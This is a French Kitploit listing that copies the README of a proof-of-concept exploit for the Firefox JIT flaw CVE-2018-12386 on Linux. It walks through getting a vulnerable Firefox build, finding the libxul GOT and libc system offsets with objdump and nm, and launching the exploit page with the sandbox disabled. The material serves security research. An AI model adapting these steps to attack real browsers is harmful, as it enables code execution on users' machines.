Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2018-12386 — CVE-2018-12386 - Exploit RCE en sandbox Firefox pour Linux (Firefox <v62.0.3) | Kitploit
Outils/GitHubGitHub/0xlyte/cve-2018-12386
Analyse des VulnérabilitésExploitationApprentissage et ÉducationDéveloppement de Charges UtilesExploitation de Binaires
GitHub0xlyte/cve-2018-12386

cve-2018-12386

CVE-2018-12386 - Exploit RCE en sandbox Firefox pour Linux (Firefox <v62.0.3)

Voir le dépôt
2il y a 6 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit RCE avec sandbox de Firefox (CVE-2018-12386)

Voici un exploit simple pour la vulnérabilité CVE-2018-12386 découverte par Niklas Baumstark, Samuel Groß et Bruno Keith.

C'est surtout une preuve de concept que j'ai faite pour le plaisir, il n'y a pas de contournement du sandbox et cela ne fonctionnera que sur une configuration Linux donnée où les décalages (offsets) utilisés par l'exploit sont déjà connus (ils peuvent être modifiés dans exploit/offsets.js).

Cet exploit fonctionne pour les versions antérieures à Firefox 62.0.3 et Firefox ESR 60.2.2.

Télécharger Firefox pour tester l'exploit

Vous pouvez télécharger les anciennes versions de Firefox directement depuis le serveur FTP de Mozilla : https://ftp.mozilla.org/pub/firefox/releases/

Vous pouvez utiliser, par exemple, la version 62.0.2 pour Linux 64 bits : https://ftp.mozilla.org/pub/firefox/releases/62.0.2/linux-x86_64/en-US/firefox-62.0.2.tar.bz2.

root@kitploit:~
wget https://ftp.mozilla.org/pub/firefox/releases/62.0.2/linux-x86_64/en-US/firefox-62.0.2.tar.bz2
bzip2 -d firefox-62.0.2.tar.bz2
tar xvf firefox-62.0.2.tar

Trouver les décalages (offsets)

Décalages de libxul.so

libxul_math_max

Si vous utilisez Firefox 62.0.2, les décalages fournis dans exploit/offsets.js devraient être les bons.

Pour les autres versions, une manière simple de faire est d'utiliser la primitive addrof pour fuiter l'adresse de la fonction JavaScript Math.max, puis trouver l'adresse de base de libxul.so pour l'instance de Firefox que vous exploitez actuellement (avec cat /proc/$(pidof firefox)/maps par exemple) et soustraire les deux pour obtenir le décalage libxul_math_max.

libxul_got_memmove & libxul_got_tolower

Si vous utilisez Firefox 62.0.2, les décalages fournis dans exploit/offsets.js devraient être les bons.

Pour les autres versions, une manière simple de faire est d'utiliser objdump.

root@kitploit:~
[lyte@vm firefox-62.0.2]$ objdump -d libxul.so | grep -i memmove@GLIBC
  8006f0:   ff 25 7a ac 40 05       jmpq   *0x540ac7a(%rip)        # 5c0b370 <memmove@GLIBC_2.2.5>

[lyte@vm firefox-62.0.2]$ objdump -d libxul.so | grep -i tolower@GLIBC
  8052e0:	ff 25 82 86 40 05    	jmpq   *0x5408682(%rip)        # 5c0d968 <tolower@GLIBC_2.2.5>

5c0b370 et 5c0d968 sont les valeurs dont nous avons besoin, c'est-à-dire le décalage de memmove et tolower dans libxul.so.

Décalages de libc.so.6

Ces décalages dépendent entièrement de la version de libc que vous utilisez.

root@kitploit:~
# libc.so.6 location

[lyte@vm firefox-62.0.2]$ ldd /bin/ls | grep libc.so.6 | cut -d' ' -f3
/lib/x86_64-linux-gnu/libc.so.6

libc_tolower

root@kitploit:~
[lyte@vm firefox-62.0.2]$ nm -D /lib/x86_64-linux-gnu/libc.so.6 | grep " tolower$"
000000000002c0f0 T tolower

libc_system

root@kitploit:~
[lyte@vm firefox-62.0.2]$ nm -D /lib/x86_64-linux-gnu/libc.so.6 | grep " system$"
000000000003f480 W system

Tester l'exploit

Une fois que vous avez Firefox et les bons décalages, vous pouvez tester l'exploit en lançant la commande suivante :

root@kitploit:~
MOZ_DISABLE_CONTENT_SANDBOX=1 /path/to/vulnerable/firefox /path/to/cve-2018-12386/exploit/pwn.html

Demo

Contact

Si vous voulez dire bonjour : @lyte__

Télécharger l’outil